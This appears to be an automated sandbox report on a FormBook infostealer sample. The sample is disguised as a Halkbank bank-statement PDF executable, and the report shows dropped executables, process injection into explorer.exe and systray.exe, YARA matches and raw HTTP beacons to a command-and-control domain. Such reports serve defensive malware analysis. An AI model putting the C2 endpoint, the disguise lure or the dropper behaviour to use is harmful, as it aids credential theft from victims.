                                                                  Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                  Feb 22, 2023 09:05:10.572268009 CET234INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                                  Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                  Feb 22, 2023 09:05:10.572288990 CET235INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                                  Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.549720184.94.215.9180C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Feb 22, 2023 09:05:13.786932945 CET235OUTGET /ghii/?Azs=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gh4V4lR0M0OxnEw==&OGpK-=bVTY_sdT7 HTTP/1.1
                                                                  Host: www.energybig.xyz
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Feb 22, 2023 09:05:14.046334982 CET237INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 22 Feb 2023 08:05:13 GMT
                                                                  Server: Apache
                                                                  Content-Length: 5278
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-
                                                                  Feb 22, 2023 09:05:14.046395063 CET238INData Raw: 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33
                                                                  Data Ascii: 23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5
                                                                  Feb 22, 2023 09:05:14.046425104 CET239INData Raw: 39 20 32 2e 30 33 20 31 2e 33 32 20 33 2e 37 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31
                                                                  Data Ascii: 9 2.03 1.32 3.75 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"
                                                                  Feb 22, 2023 09:05:14.046453953 CET241INData Raw: 31 39 20 31 35 2e 32 37 20 33 2e 31 39 20 32 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36
                                                                  Data Ascii: 19 15.27 3.19 23.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.0
                                                                  Feb 22, 2023 09:05:14.046475887 CET241INData Raw: 75 73 73 69 61 6e 62 6c 75 72 20 63 6c 61 73 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20
                                                                  Data Ascii: ussianblur class="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:09:03:14
                                                                  Start date:22/02/2023
                                                                  Path:C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                                                  Imagebase:0x400000
                                                                  File size:277853 bytes
                                                                  MD5 hash:F4CAA699AD1907E12E6C5809D1A9AF5E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:1
                                                                  Start time:09:03:15
                                                                  Start date:22/02/2023
                                                                  Path:C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj
                                                                  Imagebase:0x400000
                                                                  File size:52224 bytes
                                                                  MD5 hash:80B16EC75046C2265A49A9AD7196B5BD
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 23%, ReversingLabs
                                                                  Reputation:low

                                                                  Target ID:2
                                                                  Start time:09:03:15
                                                                  Start date:22/02/2023
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7fcd70000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:3
                                                                  Start time:09:03:16
                                                                  Start date:22/02/2023
                                                                  Path:C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe
                                                                  Imagebase:0x400000
                                                                  File size:52224 bytes
                                                                  MD5 hash:80B16EC75046C2265A49A9AD7196B5BD
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.374817426.0000000000470000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.374817426.0000000000470000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.374817426.0000000000470000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.374851183.00000000004A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.374851183.00000000004A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.374851183.00000000004A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  Reputation:low

                                                                  Target ID:4
                                                                  Start time:09:03:23
                                                                  Start date:22/02/2023
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                  Imagebase:0x7ff69bc80000
                                                                  File size:3933184 bytes
                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:5
                                                                  Start time:09:03:40
                                                                  Start date:22/02/2023
                                                                  Path:C:\Windows\SysWOW64\systray.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\systray.exe
                                                                  Imagebase:0x20000
                                                                  File size:9728 bytes
                                                                  MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.576616910.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.576616910.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.576616910.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.576194364.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.576194364.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.576194364.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.576555861.00000000028D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.576555861.00000000028D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.576555861.00000000028D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  Reputation:moderate

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:15.9%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:16.4%
                                                                    Total number of Nodes:1385
                                                                    Total number of Limit Nodes:25
                                                                    execution_graph 3224 403640 SetErrorMode GetVersionExW 3225 403692 GetVersionExW 3224->3225 3226 4036ca 3224->3226 3225->3226 3227 403723 3226->3227 3228 406a35 5 API calls 3226->3228 3314 4069c5 GetSystemDirectoryW 3227->3314 3228->3227 3230 403739 lstrlenA 3230->3227 3231 403749 3230->3231 3317 406a35 GetModuleHandleA 3231->3317 3234 406a35 5 API calls 3235 403757 3234->3235 3236 406a35 5 API calls 3235->3236 3237 403763 #17 OleInitialize SHGetFileInfoW 3236->3237 3323 406668 lstrcpynW 3237->3323 3240 4037b0 GetCommandLineW 3324 406668 lstrcpynW 3240->3324 3242 4037c2 3325 405f64 3242->3325 3245 4038f7 3246 40390b GetTempPathW 3245->3246 3329 40360f 3246->3329 3248 403923 3250 403927 GetWindowsDirectoryW lstrcatW 3248->3250 3251 40397d DeleteFileW 3248->3251 3249 405f64 CharNextW 3253 4037f9 3249->3253 3254 40360f 12 API calls 3250->3254 3339 4030d0 GetTickCount GetModuleFileNameW 3251->3339 3253->3245 3253->3249 3258 4038f9 3253->3258 3256 403943 3254->3256 3255 403990 3259 403b6c ExitProcess OleUninitialize 3255->3259 3261 403a45 3255->3261 3268 405f64 CharNextW 3255->3268 3256->3251 3257 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3256->3257 3260 40360f 12 API calls 3257->3260 3425 406668 lstrcpynW 3258->3425 3263 403b91 3259->3263 3264 403b7c 3259->3264 3267 403975 3260->3267 3369 403d17 3261->3369 3265 403b99 GetCurrentProcess OpenProcessToken 3263->3265 3266 403c0f ExitProcess 3263->3266 3479 405cc8 3264->3479 3271 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3265->3271 3272 403bdf 3265->3272 3267->3251 3267->3259 3283 4039b2 3268->3283 3271->3272 3276 406a35 5 API calls 3272->3276 3273 403a54 3273->3259 3279 403be6 3276->3279 3277 403a1b 3426 40603f 3277->3426 3278 403a5c 3442 405c33 3278->3442 3281 403bfb ExitWindowsEx 3279->3281 3285 403c08 3279->3285 3281->3266 3281->3285 3283->3277 3283->3278 3483 40140b 3285->3483 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3273 3290 403a9d 3289->3290 3292 403aa2 3290->3292 3293 403aa9 3290->3293 3445 405b99 CreateDirectoryW 3292->3445 3450 405c16 CreateDirectoryW 3293->3450 3294 403a3a 3441 406668 lstrcpynW 3294->3441 3299 403aae SetCurrentDirectoryW 3300 403ac0 3299->3300 3301 403acb 3299->3301 3453 406668 lstrcpynW 3300->3453 3454 406668 lstrcpynW 3301->3454 3306 403b19 CopyFileW 3310 403ad8 3306->3310 3307 403b63 3309 406428 36 API calls 3307->3309 3309->3273 3310->3307 3311 4066a5 17 API calls 3310->3311 3313 403b4d CloseHandle 3310->3313 3455 4066a5 3310->3455 3472 406428 MoveFileExW 3310->3472 3476 405c4b CreateProcessW 3310->3476 3311->3310 3313->3310 3315 4069e7 wsprintfW LoadLibraryExW 3314->3315 3315->3230 3318 406a51 3317->3318 3319 406a5b GetProcAddress 3317->3319 3320 4069c5 3 API calls 3318->3320 3321 403750 3319->3321 3322 406a57 3320->3322 3321->3234 3322->3319 3322->3321 3323->3240 3324->3242 3326 405f6a 3325->3326 3327 4037e8 CharNextW 3326->3327 3328 405f71 CharNextW 3326->3328 3327->3253 3328->3326 3486 4068ef 3329->3486 3331 403625 3331->3248 3332 40361b 3332->3331 3495 405f37 lstrlenW CharPrevW 3332->3495 3335 405c16 2 API calls 3336 403633 3335->3336 3498 406187 3336->3498 3502 406158 GetFileAttributesW CreateFileW 3339->3502 3341 403113 3368 403120 3341->3368 3503 406668 lstrcpynW 3341->3503 3343 403136 3504 405f83 lstrlenW 3343->3504 3347 403147 GetFileSize 3348 403241 3347->3348 3367 40315e 3347->3367 3509 40302e 3348->3509 3352 403286 GlobalAlloc 3355 40329d 3352->3355 3354 4032de 3356 40302e 32 API calls 3354->3356 3359 406187 2 API calls 3355->3359 3356->3368 3357 403267 3358 4035e2 ReadFile 3357->3358 3360 403272 3358->3360 3362 4032ae CreateFileW 3359->3362 3360->3352 3360->3368 3361 40302e 32 API calls 3361->3367 3363 4032e8 3362->3363 3362->3368 3524 4035f8 SetFilePointer 3363->3524 3365 4032f6 3525 403371 3365->3525 3367->3348 3367->3354 3367->3361 3367->3368 3540 4035e2 3367->3540 3368->3255 3370 406a35 5 API calls 3369->3370 3371 403d2b 3370->3371 3372 403d31 3371->3372 3373 403d43 3371->3373 3595 4065af wsprintfW 3372->3595 3596 406536 3373->3596 3377 403d92 lstrcatW 3378 403d41 3377->3378 3587 403fed 3378->3587 3379 406536 3 API calls 3379->3377 3382 40603f 18 API calls 3383 403dc4 3382->3383 3384 403e58 3383->3384 3386 406536 3 API calls 3383->3386 3385 40603f 18 API calls 3384->3385 3387 403e5e 3385->3387 3393 403df6 3386->3393 3388 403e6e LoadImageW 3387->3388 3389 4066a5 17 API calls 3387->3389 3390 403f14 3388->3390 3391 403e95 RegisterClassW 3388->3391 3389->3388 3395 40140b 2 API calls 3390->3395 3394 403ecb SystemParametersInfoW CreateWindowExW 3391->3394 3424 403f1e 3391->3424 3392 403e17 lstrlenW 3397 403e25 lstrcmpiW 3392->3397 3398 403e4b 3392->3398 3393->3384 3393->3392 3396 405f64 CharNextW 3393->3396 3394->3390 3399 403f1a 3395->3399 3400 403e14 3396->3400 3397->3398 3401 403e35 GetFileAttributesW 3397->3401 3402 405f37 3 API calls 3398->3402 3404 403fed 18 API calls 3399->3404 3399->3424 3400->3392 3403 403e41 3401->3403 3405 403e51 3402->3405 3403->3398 3406 405f83 2 API calls 3403->3406 3407 403f2b 3404->3407 3601 406668 lstrcpynW 3405->3601 3406->3398 3409 403f37 ShowWindow 3407->3409 3410 403fba 3407->3410 3411 4069c5 3 API calls 3409->3411 3602 40579d OleInitialize 3410->3602 3413 403f4f 3411->3413 3415 403f5d GetClassInfoW 3413->3415 3418 4069c5 3 API calls 3413->3418 3414 403fc0 3416 403fc4 3414->3416 3417 403fdc 3414->3417 3420 403f71 GetClassInfoW RegisterClassW 3415->3420 3421 403f87 DialogBoxParamW 3415->3421 3422 40140b 2 API calls 3416->3422 3416->3424 3419 40140b 2 API calls 3417->3419 3418->3415 3419->3424 3420->3421 3423 40140b 2 API calls 3421->3423 3422->3424 3423->3424 3424->3273 3425->3246 3624 406668 lstrcpynW 3426->3624 3428 406050 3625 405fe2 CharNextW CharNextW 3428->3625 3431 403a27 3431->3259 3440 406668 lstrcpynW 3431->3440 3432 4068ef 5 API calls 3438 406066 3432->3438 3433 406097 lstrlenW 3434 4060a2 3433->3434 3433->3438 3435 405f37 3 API calls 3434->3435 3437 4060a7 GetFileAttributesW 3435->3437 3437->3431 3438->3431 3438->3433 3439 405f83 2 API calls 3438->3439 3631 40699e FindFirstFileW 3438->3631 3439->3433 3440->3294 3441->3261 3443 406a35 5 API calls 3442->3443 3444 403a61 lstrcatW 3443->3444 3444->3288 3444->3289 3446 403aa7 3445->3446 3447 405bea GetLastError 3445->3447 3446->3299 3447->3446 3448 405bf9 SetFileSecurityW 3447->3448 3448->3446 3449 405c0f GetLastError 3448->3449 3449->3446 3451 405c2a GetLastError 3450->3451 3452 405c26 3450->3452 3451->3452 3452->3299 3453->3301 3454->3310 3459 4066b2 3455->3459 3456 4068d5 3457 403b0d DeleteFileW 3456->3457 3636 406668 lstrcpynW 3456->3636 3457->3306 3457->3310 3459->3456 3460 4068a3 lstrlenW 3459->3460 3461 4067ba GetSystemDirectoryW 3459->3461 3464 406536 3 API calls 3459->3464 3465 4066a5 10 API calls 3459->3465 3466 4067cd GetWindowsDirectoryW 3459->3466 3467 406844 lstrcatW 3459->3467 3468 4066a5 10 API calls 3459->3468 3469 4068ef 5 API calls 3459->3469 3470 4067fc SHGetSpecialFolderLocation 3459->3470 3634 4065af wsprintfW 3459->3634 3635 406668 lstrcpynW 3459->3635 3460->3459 3461->3459 3464->3459 3465->3460 3466->3459 3467->3459 3468->3459 3469->3459 3470->3459 3471 406814 SHGetPathFromIDListW CoTaskMemFree 3470->3471 3471->3459 3473 406449 3472->3473 3474 40643c 3472->3474 3473->3310 3637 4062ae 3474->3637 3477 405c8a 3476->3477 3478 405c7e CloseHandle 3476->3478 3477->3310 3478->3477 3482 405cdd 3479->3482 3480 403b89 ExitProcess 3481 405cf1 MessageBoxIndirectW 3481->3480 3482->3480 3482->3481 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3266 3487 4068fc 3486->3487 3489 406972 3487->3489 3490 406965 CharNextW 3487->3490 3492 405f64 CharNextW 3487->3492 3493 406951 CharNextW 3487->3493 3494 406960 CharNextW 3487->3494 3488 406977 CharPrevW 3488->3489 3489->3488 3491 406998 3489->3491 3490->3487 3490->3489 3491->3332 3492->3487 3493->3487 3494->3490 3496 405f53 lstrcatW 3495->3496 3497 40362d 3495->3497 3496->3497 3497->3335 3499 406194 GetTickCount GetTempFileNameW 3498->3499 3500 40363e 3499->3500 3501 4061ca 3499->3501 3500->3248 3501->3499 3501->3500 3502->3341 3503->3343 3505 405f91 3504->3505 3506 40313c 3505->3506 3507 405f97 CharPrevW 3505->3507 3508 406668 lstrcpynW 3506->3508 3507->3505 3507->3506 3508->3347 3510 403057 3509->3510 3511 40303f 3509->3511 3513 403067 GetTickCount 3510->3513 3514 40305f 3510->3514 3512 403048 DestroyWindow 3511->3512 3517 40304f 3511->3517 3512->3517 3516 403075 3513->3516 3513->3517 3544 406a71 3514->3544 3518 4030aa CreateDialogParamW ShowWindow 3516->3518 3519 40307d 3516->3519 3517->3352 3517->3368 3543 4035f8 SetFilePointer 3517->3543 3518->3517 3519->3517 3548 403012 3519->3548 3521 40308b wsprintfW 3551 4056ca 3521->3551 3524->3365 3526 403380 SetFilePointer 3525->3526 3527 40339c 3525->3527 3526->3527 3562 403479 GetTickCount 3527->3562 3532 403479 42 API calls 3533 4033d3 3532->3533 3534 40343f ReadFile 3533->3534 3538 4033e2 3533->3538 3539 403439 3533->3539 3534->3539 3536 4061db ReadFile 3536->3538 3538->3536 3538->3539 3577 40620a 